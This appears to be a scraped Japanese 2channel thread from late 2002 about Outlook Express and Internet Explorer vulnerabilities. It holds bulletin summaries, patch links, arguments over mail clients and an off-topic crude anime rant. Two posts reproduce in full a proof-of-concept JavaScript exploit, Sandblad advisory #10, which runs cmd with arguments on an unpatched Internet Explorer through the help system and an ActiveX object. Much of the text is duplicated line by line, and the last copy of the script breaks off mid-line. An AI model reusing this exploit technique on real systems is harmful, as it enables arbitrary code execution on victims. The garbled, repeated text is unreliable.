The fix for this issue was included in Windows XP Service Pack 1, and in Internet Explorer 6.0 Service Pack 1. If you’ve installed either of these two service packs, you’re already protected against the vulnerability and don’t need the patch.
http://www.microsoft.com/technet/security/bulletin/MS02-058.asp
184 :名無しさん@お腹いっぱい。:02/10/11 10:31
おまえら真面目にやれよ!!!
アニヲタの自覚あんのかよ!!
ラムが基本なんだよ!すべてはここから始まるんだよ!!
原作を完読しれっ!!TVシリーズを10日で全部見ろっ!!
亜空間アルバイトの回やつるつるセッケンの回をキャプしろっ!!!
口付け宅急便の扉絵を涎と精液でドロドロにしろっ!!!
話 は そ れ か ら な ん だ よ !!!
他のキャラに走るのはラムが卒業できてからなんだよ!!!
たとえ卒業できなくたって構やしねぇんだよっ!!!
原点なんだよ!!!伝説なんだよ!!!神話なんだよ!!!
ラム語れねぇヤシが偉そうな口たたくんじゃねぇよっ!!!
卒業できねぇヤシが『本気ラム』なんだよっ!!
もう一回言うぞっ!!!
おまいら真面目にやれよっっっ!!!!
アニヲタの自覚あんのかよ!!
ラムが基本なんだよ!すべてはここから始まるんだよ!!
原作を完読しれっ!!TVシリーズを10日で全部見ろっ!!
亜空間アルバイトの回やつるつるセッケンの回をキャプしろっ!!!
口付け宅急便の扉絵を涎と精液でドロドロにしろっ!!!
話 は そ れ か ら な ん だ よ !!!
他のキャラに走るのはラムが卒業できてからなんだよ!!!
たとえ卒業できなくたって構やしねぇんだよっ!!!
原点なんだよ!!!伝説なんだよ!!!神話なんだよ!!!
ラム語れねぇヤシが偉そうな口たたくんじゃねぇよっ!!!
卒業できねぇヤシが『本気ラム』なんだよっ!!
もう一回言うぞっ!!!
おまいら真面目にやれよっっっ!!!!
185 :MS02-058:02/10/11 13:08
解説:
Outlook Expressに深刻なホール,特定メールのプレビュで任意のコードを実行される
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021011/1/
対策はパッチの適用,ただしXP SP1とIE6 SP1では対策済み
MS日本語要約情報
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS02-058ov.asp
Outlook Expressに深刻なホール,特定メールのプレビュで任意のコードを実行される
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021011/1/
対策はパッチの適用,ただしXP SP1とIE6 SP1では対策済み
MS日本語要約情報
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS02-058ov.asp
>>183
ご親切にありがとうございました。
ご親切にありがとうございました。
187 :名無しさん@お腹いっぱい。:02/10/11 23:06
いい加減 江戸マックスとかのフリーのまともなメーラーに替えたら?
なんでOEなんていつまでも使ってるわけ? マゾですか?
なんでOEなんていつまでも使ってるわけ? マゾですか?
188 :名無しさん@お腹いっぱい。:02/10/11 23:54
江戸マックス、そろそろ枯れてきて、いい塩梅
秀丸、枯れすぎた これもスバラスィ
秀丸、枯れすぎた これもスバラスィ
189 :名無しさん@お腹いっぱい。:02/10/11 23:55
190 :名無しさん@お腹いっぱい。:02/10/11 23:59
IEコンポーネント、使わなきゃエエべ
191 :名無しさん@お腹いっぱい。:02/10/12 00:19
MS02-058 は激しくヤバいね。
これって、以前NimdaやBadtransの大流行を招いた
原因と同じじゃない?
メールを受信しただけで感染させるウイルスとか出そてきそう。
今度こそ、OE使うのはきっぱりやめようね。
これって、以前NimdaやBadtransの大流行を招いた
原因と同じじゃない?
メールを受信しただけで感染させるウイルスとか出そてきそう。
今度こそ、OE使うのはきっぱりやめようね。
192 :名無しさん@お腹いっぱい。:02/10/12 00:20
>>191
べつにぃ、、、OE SP1 ですが、何か?
べつにぃ、、、OE SP1 ですが、何か?
193 :名無しさん@お腹いっぱい。:02/10/12 10:12
194 :名無しさん@お腹いっぱい。:02/10/12 10:43
OEヲタ必死だな
195 :名無しさん@お腹いっぱい。:02/10/12 11:00
196 :名無しさん@お腹いっぱい。:02/10/12 11:05
197 :名無しさん@お腹いっぱい。:02/10/12 12:49
OEは糞という奴はたくさんいるけど、じゃあ代わりに何を使えばいいんだ?
という問いに的確に回答で切る奴は殆どいない。
IEコンポーネント未使用で完全に無料(ウザイ広告付加)で使える物列挙してみろよ。
という問いに的確に回答で切る奴は殆どいない。
IEコンポーネント未使用で完全に無料(ウザイ広告付加)で使える物列挙してみろよ。
198 :名無しさん@お腹いっぱい。 :02/10/12 14:18
NIFTYのウェブメール。
199 :名無しさん@お腹いっぱい。:02/10/12 17:09
電八はIEコンポーネント使ってないような気がする…。
初心者にはお薦めしないが(w
初心者にはお薦めしないが(w
200 :名無しさん@お腹いっぱい。:02/10/12 21:20
>>197
なんでも無料だと思ってる奴は馬鹿。そもそもOEだって無料というわけじゃないだろ。
なんでも無料だと思ってる奴は馬鹿。そもそもOEだって無料というわけじゃないだろ。
201 :名無しさん@お腹いっぱい。:02/10/12 21:36
197は精神を病んでるな・・
202 :名無しさん@お腹いっぱい。:02/10/12 21:51
ネスケ付属の奴とか。
203 :名無しさん@お腹いっぱい。:02/10/12 23:04
>>200-201
ごたくは良いから無料の奴挙げろ。
ごたくは良いから無料の奴挙げろ。
204 :名無しさん@お腹いっぱい。:02/10/13 10:36
>>203
馬鹿はOEでも使ってろ。
馬鹿はOEでも使ってろ。
205 :名無しさん@お腹いっぱい。:02/10/13 12:05
まあ、理由も示さずに「OEは糞」と言ってる奴も多いわけだが。
相手を説得したいなら納得させる努力をしろよ。
そのためにはOEについて詳しく知る必要がある。
その点でこのスレッドは有用だと思う。
相手を説得したいなら納得させる努力をしろよ。
そのためにはOEについて詳しく知る必要がある。
その点でこのスレッドは有用だと思う。
206 :名無しさん@お腹いっぱい。:02/10/13 15:38
メールを見ただけで、ウィルスにやられるOEは糞。
207 :名無しさん@お腹いっぱい。:02/10/13 16:56
>>206 かつてはね(今後もないという保証はないが…)。つーかアップデートしろよ(w
208 :名無しさん@お腹いっぱい。:02/10/14 10:21
>>206
(藁
(藁
209 :名無しさん@お腹いっぱい。:02/10/14 11:22
OEのおかげで儲かってます。今後ともセキュリティホールをよろしく。
トレンドマイクロ
シマンテック
トレンドマイクロ
シマンテック
210 :名無しさん@お腹いっぱい。:02/10/15 01:57
>>209
セキュリティーホールはウイルスだけじゃないんだが・・・・・・
セキュリティーホールはウイルスだけじゃないんだが・・・・・・
211 :名無しさん@お腹いっぱい。:02/10/17 11:10
証明書確認の問題により、ID が偽装される (Q328145) (MS02-050)
Microsoft Office 2001 for Mac および Microsoft Office 98 for Macintosh
Edition の問題を修正するプログラムを公開しました。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-050.asp
対象:Microsoft(R) Windows、Office for Mac、Internet Explorer for Mac
または Outlook Express for Mac
Microsoft Office 2001 for Mac および Microsoft Office 98 for Macintosh
Edition の問題を修正するプログラムを公開しました。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-050.asp
対象:Microsoft(R) Windows、Office for Mac、Internet Explorer for Mac
または Outlook Express for Mac
212 :名無しさん@お腹いっぱい。:02/10/17 11:17
パーソナルセキュリティ研究所
・ポートスキャン
http://210.143.99.143/~p-sec/pscan.html
・Windows診断
http://210.143.99.143/~p-sec/winsec.html
・ポートスキャン
http://210.143.99.143/~p-sec/pscan.html
・Windows診断
http://210.143.99.143/~p-sec/winsec.html
213 :名無しさん@お腹いっぱい。:02/10/26 12:13
214 :名無しさん@お腹いっぱい。:02/11/07 10:07
ほす
215 :名無しさん@お腹いっぱい。:02/11/20 08:25
マイクロソフト,セキュリティ・ホールの深刻度に関する評価方法を変更
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021119/2/
マイクロソフトは11月19日,同社が公開する「セキュリティ情報」において,その
深刻度の評価方法を変更した。従来は「高(High)」,「中(Moderate)」,
「低(Low)」の3段階であったものを,「緊急(Critical)」,「重要(Important)」,
「警告(Moderate)」,「注意(Low)」の4段階にする。
http://www.microsoft.com/japan/technet/security/policy/rating.asp
http://www.microsoft.com/technet/security/policy/rating.asp
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20021119/2/
マイクロソフトは11月19日,同社が公開する「セキュリティ情報」において,その
深刻度の評価方法を変更した。従来は「高(High)」,「中(Moderate)」,
「低(Low)」の3段階であったものを,「緊急(Critical)」,「重要(Important)」,
「警告(Moderate)」,「注意(Low)」の4段階にする。
http://www.microsoft.com/japan/technet/security/policy/rating.asp
http://www.microsoft.com/technet/security/policy/rating.asp
216 :MS02-065:02/11/21 11:11
MS02-065 に関する情報
「MS02-065: Microsoft Data Access Components のバッファ オーバーラン
により、コードが実行される (Q329414)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この問題は、Microsoft Data Access Components (MDAC) に含まれる
Remote Data Services (RDS) コンポーネントでの文字列の処理に含まれる
未チェックのバッファにより、不正なプログラムが実行される可能性が
あります。
対象となる製品
==============
・Microsoft Data Access Components (MDAC) 2.1
・Microsoft Data Access Components (MDAC) 2.5
・Microsoft Data Access Components (MDAC) 2.6
・Internet Explorer 5.01
・Internet Explorer 5.5
・Internet Explorer 6
つづく
「MS02-065: Microsoft Data Access Components のバッファ オーバーラン
により、コードが実行される (Q329414)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この問題は、Microsoft Data Access Components (MDAC) に含まれる
Remote Data Services (RDS) コンポーネントでの文字列の処理に含まれる
未チェックのバッファにより、不正なプログラムが実行される可能性が
あります。
対象となる製品
==============
・Microsoft Data Access Components (MDAC) 2.1
・Microsoft Data Access Components (MDAC) 2.5
・Microsoft Data Access Components (MDAC) 2.6
・Internet Explorer 5.01
・Internet Explorer 5.5
・Internet Explorer 6
つづく
217 :MS02-065:02/11/21 11:11
つづき
以下の OS を利用しているユーザーは修正プログラムをインストールする
必要があります。
・Windows 98
・Windows 98 Second Edition
・Windows Millennium Edition
・Windows NT4.0
・Windows 2000
MDAC 2.7 および Windows XP はこの問題の影響を受けません。
MDAC のバージョンの確認方法については次の技術情報をご覧ください。
JP301202 [HOW TO] MDAC のバージョンを確認する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;JP301202
修正プログラム
==============
・Microsoft Data Access Components (MDAC)
http://download.microsoft.com/download/dasdk/Patch/Q329414/W98NT42KMe/EN-US/q329414_mdacall_x86.exe
以下の OS を利用しているユーザーは修正プログラムをインストールする
必要があります。
・Windows 98
・Windows 98 Second Edition
・Windows Millennium Edition
・Windows NT4.0
・Windows 2000
MDAC 2.7 および Windows XP はこの問題の影響を受けません。
MDAC のバージョンの確認方法については次の技術情報をご覧ください。
JP301202 [HOW TO] MDAC のバージョンを確認する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;JP301202
修正プログラム
==============
・Microsoft Data Access Components (MDAC)
http://download.microsoft.com/download/dasdk/Patch/Q329414/W98NT42KMe/EN-US/q329414_mdacall_x86.exe
218 :MS02-066 IEの累積的修正プログラム(Q328970):02/11/21 11:14
MS02-066 に関する情報
http://www.microsoft.com/japan/technet/security/bulletin/ms02-066ov.asp
「MS02-066: Internet Explorer 用の累積的な修正プログラム (Q328970)」に
関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS02-047 : Internet Explorer 用の累積的な
修正プログラム (Q323759) で修正された問題に加えて、新たに 6 つの問題を
排除します。
対象となる製品
==============
・ Internet Explorer 6、6 Service Pack 1
・ Internet Explorer 5.5 Service Pack 2
・ Internet Explorer 5.01 Service Pack 3 for Windows 2000
注意: Internet Explorer 5.01 Service Pack 3 の修正プログラムは、
Windows 2000 環境にのみ適用可能です。
修正プログラム
==============
・ Internet Explorer 6 Service Pack 1
http://download.microsoft.com/download/ie6sp1/30secpac/6_sp1/W98NT42KMeXP/JA/q328970.exe
・ Internet Explorer 6
http://download.microsoft.com/download/IE60/30secpac/6/W98NT42KMeXP/JA/q328970.exe
・ Internet Explorer 5.5 Service Pack 2
http://download.microsoft.com/download/ie55sp2/30secpac/5.5_sp2/W98NT42KMe/JA/q328970.exe
・ Internet Explorer 5.01 Service Pack 3
http://download.microsoft.com/download/ie501sp2/30secpac/5.01_sp3/NT5/JA/q328970.exe
http://www.microsoft.com/japan/technet/security/bulletin/ms02-066ov.asp
「MS02-066: Internet Explorer 用の累積的な修正プログラム (Q328970)」に
関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
概要
====
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS02-047 : Internet Explorer 用の累積的な
修正プログラム (Q323759) で修正された問題に加えて、新たに 6 つの問題を
排除します。
対象となる製品
==============
・ Internet Explorer 6、6 Service Pack 1
・ Internet Explorer 5.5 Service Pack 2
・ Internet Explorer 5.01 Service Pack 3 for Windows 2000
注意: Internet Explorer 5.01 Service Pack 3 の修正プログラムは、
Windows 2000 環境にのみ適用可能です。
修正プログラム
==============
・ Internet Explorer 6 Service Pack 1
http://download.microsoft.com/download/ie6sp1/30secpac/6_sp1/W98NT42KMeXP/JA/q328970.exe
・ Internet Explorer 6
http://download.microsoft.com/download/IE60/30secpac/6/W98NT42KMeXP/JA/q328970.exe
・ Internet Explorer 5.5 Service Pack 2
http://download.microsoft.com/download/ie55sp2/30secpac/5.5_sp2/W98NT42KMe/JA/q328970.exe
・ Internet Explorer 5.01 Service Pack 3
http://download.microsoft.com/download/ie501sp2/30secpac/5.01_sp3/NT5/JA/q328970.exe
219 :名無しさん@お腹いっぱい。:02/11/21 12:22
MS込んj
220 :名無しさん@お腹いっぱい。:02/11/21 12:29
>>216-218
お疲れさん。ありがとう。
お疲れさん。ありがとう。
221 :名無しさん@お腹いっぱい。:02/11/21 13:16
>>216-217のMS02-065は深刻度(緊急)だから該当者はすぐに対処した方がよさそうだね。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-065ov.asp
>>218のMS02-066は最大深刻度(重要)
http://www.microsoft.com/japan/technet/security/bulletin/ms02-066ov.asp
http://www.microsoft.com/japan/technet/security/bulletin/ms02-065ov.asp
>>218のMS02-066は最大深刻度(重要)
http://www.microsoft.com/japan/technet/security/bulletin/ms02-066ov.asp
223 :名無しさん@お腹いっぱい。:02/11/21 14:44
MDなんたらってのはサーバー立てしてない奴は関係ないんでしょ?
224 :名無しさん@お腹いっぱい。:02/11/21 14:48
>>223
対策が行われていないシステムがインターネットなどのネットワークを通
じて他のコンピュータと接続している場合、この問題を悪用した攻撃を受
けることがあります。この攻撃は、受動的攻撃という悪意のあるユーザー
から送られた HTML 形式の電子メールからも攻撃を受ける可能性がありま
す。この攻撃は、ハッカーまたはクラッカーと呼ばれる悪意のあるユーザー
や、ワームといった自動的な攻撃を目的とした悪意のあるプログラムから
行われることがあります。
・Internet Explorer に想定する実害
意図しないアプリケーションが動作させられる可能性があります。その結
果、ワームの感染、データの削除、トロイの木馬の実行などが考えられま
す。
対策が行われていないシステムがインターネットなどのネットワークを通
じて他のコンピュータと接続している場合、この問題を悪用した攻撃を受
けることがあります。この攻撃は、受動的攻撃という悪意のあるユーザー
から送られた HTML 形式の電子メールからも攻撃を受ける可能性がありま
す。この攻撃は、ハッカーまたはクラッカーと呼ばれる悪意のあるユーザー
や、ワームといった自動的な攻撃を目的とした悪意のあるプログラムから
行われることがあります。
・Internet Explorer に想定する実害
意図しないアプリケーションが動作させられる可能性があります。その結
果、ワームの感染、データの削除、トロイの木馬の実行などが考えられま
す。
225 :名無しさん@お腹いっぱい。:02/11/21 14:53
226 :名無しさん@お腹いっぱい。:02/11/21 16:36
http://download.microsoft.com/download/ie6sp1/30secpac/6_sp1/W98NT42KMeXP/JA/q328970.exe
このパッチ当たらない。「SP1が必要です」って言われる。
さっきSP1入れたばっかなのに。
このパッチ当たらない。「SP1が必要です」って言われる。
さっきSP1入れたばっかなのに。
227 :名無しさん@お腹いっぱい。:02/11/21 16:40
>>226 再起動してみ
228 :bloom:02/11/21 16:41
229 :名無しさん@お腹いっぱい。:02/11/21 17:55
>>216-218の解説記事
データベース・アクセス機能に重大なセキュリティ・ホール,
Windows XP以外のほとんどのシステムが危険
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20021121/3/
マイクロソフト,IE向け最新セキュリティ・パッチを公開
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20021121/2/
データベース・アクセス機能に重大なセキュリティ・ホール,
Windows XP以外のほとんどのシステムが危険
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20021121/3/
マイクロソフト,IE向け最新セキュリティ・パッチを公開
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20021121/2/
230 :226:02/11/21 18:27
231 :名無しさん@お腹いっぱい。:02/11/21 18:45
>>230 いや、いまIE6SP1に当ててみたが「SP1が必要です」とは出なかった。
まずIEのバージョンがSP1か確認してそうでなかったらもう一度IE6SP1にする。
SP1の表示がなされていたらInternet Explorerの修復をしてみる。
それでもだめならIE6SP1の再インスコ。
うまくパッチが当たったらバージョン情報にはSP1; Q328970;と表示される。
まずIEのバージョンがSP1か確認してそうでなかったらもう一度IE6SP1にする。
SP1の表示がなされていたらInternet Explorerの修復をしてみる。
それでもだめならIE6SP1の再インスコ。
うまくパッチが当たったらバージョン情報にはSP1; Q328970;と表示される。
232 :名無しさん@お腹いっぱい。:02/11/21 19:56
Win95の場合、MS02-065のパッチは諦めるしかないのでしょうか?
233 :名無しさん@お腹いっぱい。:02/11/21 20:17
>>232
もうサポート対象外。
もうサポート対象外。
234 :名無しさん@お腹いっぱい。:02/11/21 20:55
http://www.microsoft.com/downloads/release.asp?releaseid=44662
入れた俺のOE SP1は
http://memo.st.ryukoku.ac.jp/archive/200211.month/4998.html
が発生しないわけだが、既出?
入れた俺のOE SP1は
http://memo.st.ryukoku.ac.jp/archive/200211.month/4998.html
が発生しないわけだが、既出?
236 :名無しさん@お腹いっぱい。:02/11/22 00:55
証明書確認の問題により、ID が偽装される (Q329115) (MS02-050)
http://www.microsoft.com/japan/technet/security/bulletin/MS02-050.asp
MS02-065, MS02-066 にかくれて、コソッと修正の修正がでてるから注意! 最大深刻度 : 重要
直リン倶楽部
・Windows 98 PC/AT 互換機用
ttp://download.microsoft.com/download/win98/Update/25897/W98/JA/329115JPN8.EXE
・Windows 98 Second Edition PC/AT 互換機用
ttp://download.microsoft.com/download/win98/Update/25897/W98/JA/329115JPN8.EXE
・Windows Millennium Edition
ttp://download.microsoft.com/download/winme/Update/25897/WinMe/JA/329115JPNM.EXE
・Windows 2000 PC/AT 互換機用
ttp://download.microsoft.com/download/win2000platform/patch/Q329115/nt5/ja/Q329115_W2K_SP4_X86_JA.exe
・Windows XP and Windows XP 64 Bit Edition
ttp://download.microsoft.com/download/whistler/Patch/Q329115/WXP/JA/Q329115_WXP_SP2_x86_JPN.exe
http://www.microsoft.com/japan/technet/security/bulletin/MS02-050.asp
MS02-065, MS02-066 にかくれて、コソッと修正の修正がでてるから注意! 最大深刻度 : 重要
直リン倶楽部
・Windows 98 PC/AT 互換機用
ttp://download.microsoft.com/download/win98/Update/25897/W98/JA/329115JPN8.EXE
・Windows 98 Second Edition PC/AT 互換機用
ttp://download.microsoft.com/download/win98/Update/25897/W98/JA/329115JPN8.EXE
・Windows Millennium Edition
ttp://download.microsoft.com/download/winme/Update/25897/WinMe/JA/329115JPNM.EXE
・Windows 2000 PC/AT 互換機用
ttp://download.microsoft.com/download/win2000platform/patch/Q329115/nt5/ja/Q329115_W2K_SP4_X86_JA.exe
・Windows XP and Windows XP 64 Bit Edition
ttp://download.microsoft.com/download/whistler/Patch/Q329115/WXP/JA/Q329115_WXP_SP2_x86_JPN.exe
237 : :02/11/22 01:26
http://archives.neohapsis.com/archives/bugtraq/2002-11/0041.html
http://sec.greymagic.com/adv/gm012-ie/
http://archives.neohapsis.com/archives/bugtraq/2002-11/0047.html
http://archives.neohapsis.com/archives/bugtraq/2002-11/0114.html
http://archives.neohapsis.com/archives/bugtraq/2002-11/0126.html
--------------------------- CUT HERE ---------------------------
<*script>
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, [email protected]
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
'echo Sandblad #10 > c:/vulnerable.txt & winmine';
http://sec.greymagic.com/adv/gm012-ie/
http://archives.neohapsis.com/archives/bugtraq/2002-11/0047.html
http://archives.neohapsis.com/archives/bugtraq/2002-11/0114.html
http://archives.neohapsis.com/archives/bugtraq/2002-11/0126.html
--------------------------- CUT HERE ---------------------------
<*script>
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, [email protected]
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
'echo Sandblad #10 > c:/vulnerable.txt & winmine';
if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:')");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();");
close();
}
</script>
--------------------------- CUT HERE ---------------------------
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:')");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();");
close();
}
</script>
--------------------------- CUT HERE ---------------------------
239 :名無しさん@お腹いっぱい。:02/11/22 01:37
「MS02-065: Microsoft Data Access Components のバッファ オーバーランにより、コードが実行される (Q329414)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-065ov.asp
「MS02-066: Internet Explorer 用の累積的な修正プログラム (Q328970)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-066ov.asp
証明書確認の問題により、ID が偽装される (Q329115) (MS02-050)
http://www.microsoft.com/japan/technet/security/bulletin/MS02-050.asp
http://www.microsoft.com/japan/technet/security/bulletin/ms02-065ov.asp
「MS02-066: Internet Explorer 用の累積的な修正プログラム (Q328970)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-066ov.asp
証明書確認の問題により、ID が偽装される (Q329115) (MS02-050)
http://www.microsoft.com/japan/technet/security/bulletin/MS02-050.asp
241 :名無しさん@お腹いっぱい。:02/11/23 09:39
Windows Updateを使わずにインストールしたセキュティパッチは
Windows Updateのインストール履歴には表示されませんよね?
ヘルプ→バージョン情報では適用されていても表示されない
修正プログラムもあるみたいですし
(MS02-XXX)の問題を修正する修正プログラム(QXXXXXX):適用済み
みたいな感じで一覧表示できる機能はないものですかねえ。
Windows Updateのインストール履歴には表示されませんよね?
ヘルプ→バージョン情報では適用されていても表示されない
修正プログラムもあるみたいですし
(MS02-XXX)の問題を修正する修正プログラム(QXXXXXX):適用済み
みたいな感じで一覧表示できる機能はないものですかねえ。
242 :名無しさん@お腹いっぱい。:02/11/23 09:49
>>241
俺のマシンにはQFECHECK.EXEつーのが入ってるけど入手経路は忘れた。MS御謹製な事は確実だが。
俺のマシンにはQFECHECK.EXEつーのが入ってるけど入手経路は忘れた。MS御謹製な事は確実だが。
243 :名無しさん@お腹いっぱい。:02/11/23 11:17
>>241
「アプリケーションの追加と削除」に全部出るだろ?
「アプリケーションの追加と削除」に全部出るだろ?
244 :名無しさん@お腹いっぱい。:02/11/27 20:55
パッチを無効にされる恐れあり
Windowsの深刻なセキュリティ・ホールを解説する
ほとんどのWindowsシステムが影響を受ける深刻なセキュリティ・ホールが公開
された。今回のコラムでは,このセキュリティ・ホールの詳細や対策方法について
解説したい。注意しなければならないのは,修正パッチを適用するだけでは万全
といえないことだ。パッチが“無効化”される恐れがある。万全の対策を施せない
間は,Internet Explorerなどの利用を中止することも考慮したい。それほどまでに
深刻なセキュリティ・ホールなのだ。
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20021126/1/
Windowsの深刻なセキュリティ・ホールを解説する
ほとんどのWindowsシステムが影響を受ける深刻なセキュリティ・ホールが公開
された。今回のコラムでは,このセキュリティ・ホールの詳細や対策方法について
解説したい。注意しなければならないのは,修正パッチを適用するだけでは万全
といえないことだ。パッチが“無効化”される恐れがある。万全の対策を施せない
間は,Internet Explorerなどの利用を中止することも考慮したい。それほどまでに
深刻なセキュリティ・ホールなのだ。
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20021126/1/
245 :名無しさん@お腹いっぱい。:02/11/27 20:58
>>244関連
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/fq02-065.asp
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/fq02-065.asp
246 :名無しさん@お腹いっぱい。:02/11/27 22:33
IEを削除。心穏やかに暮らせます。
247 :名無しさん@お腹いっぱい。:02/11/27 23:21
過去アップデートのデジタル証明書がそのまま上書き利用されるってわけね。
これは盲点だったなMS。見つけたときにはガクガクブルブルだっただろう。
対策機能としてKillBitとかいってるけど、これも名前からして
なんか容易くフラグをいじられてしまいそうな感もある(w
これは盲点だったなMS。見つけたときにはガクガクブルブルだっただろう。
対策機能としてKillBitとかいってるけど、これも名前からして
なんか容易くフラグをいじられてしまいそうな感もある(w
248 :名無しさん@お腹いっぱい。:02/11/28 04:07
Operaってセキュリティホールないの?
249 :名無しさん@お腹いっぱい。:02/11/28 09:11
>>248 以前のOpera6.01や6.02にはあったよ。
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020528/1/
現在の6.05ではまだ発見されて無いみたい。
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020528/1/
現在の6.05ではまだ発見されて無いみたい。
250 :名無しさん@お腹いっぱい。:02/11/28 11:00
Microsoft Data Access Components のバッファ オーバーランにより、
コードが実行される (Q329414) (MS02-065) 【最大深刻度 : 緊急】
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-065.asp
●修正パッチを当てるよりもMDACを2.7にすることを推奨。理由:>>244
http://support.microsoft.com/default.aspx?scid=kb;ja;JP301202
でMDACのバージョンを確認して2.7以外ならMDAC2.7をインストール。
http://support.microsoft.com/default.aspx?scid=http://www.microsoft.com/japan/developer/data/download.asp
参考:http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/fq02-065.asp
コードが実行される (Q329414) (MS02-065) 【最大深刻度 : 緊急】
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-065.asp
●修正パッチを当てるよりもMDACを2.7にすることを推奨。理由:>>244
http://support.microsoft.com/default.aspx?scid=kb;ja;JP301202
でMDACのバージョンを確認して2.7以外ならMDAC2.7をインストール。
http://support.microsoft.com/default.aspx?scid=http://www.microsoft.com/japan/developer/data/download.asp
参考:http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/fq02-065.asp
251 :名無しさん@お腹いっぱい。:02/11/28 17:11
http://archives.neohapsis.com/archives/bugtraq/2002-11/0041.html
http://sec.greymagic.com/adv/gm012-ie/
http://archives.neohapsis.com/archives/bugtraq/2002-11/0047.html
http://archives.neohapsis.com/archives/bugtraq/2002-11/0114.html
http://archives.neohapsis.com/archives/bugtraq/2002-11/0126.html
http://sec.greymagic.com/adv/gm012-ie/
http://archives.neohapsis.com/archives/bugtraq/2002-11/0047.html
http://archives.neohapsis.com/archives/bugtraq/2002-11/0114.html
http://archives.neohapsis.com/archives/bugtraq/2002-11/0126.html
<script>
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, [email protected]
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
'echo Sandblad #10 > c:/vulnerable.txt & winmine';
if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:')");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();");
close();
}
</script>
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, [email protected]
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
'echo Sandblad #10 > c:/vulnerable.txt & winmine';
if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:')");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
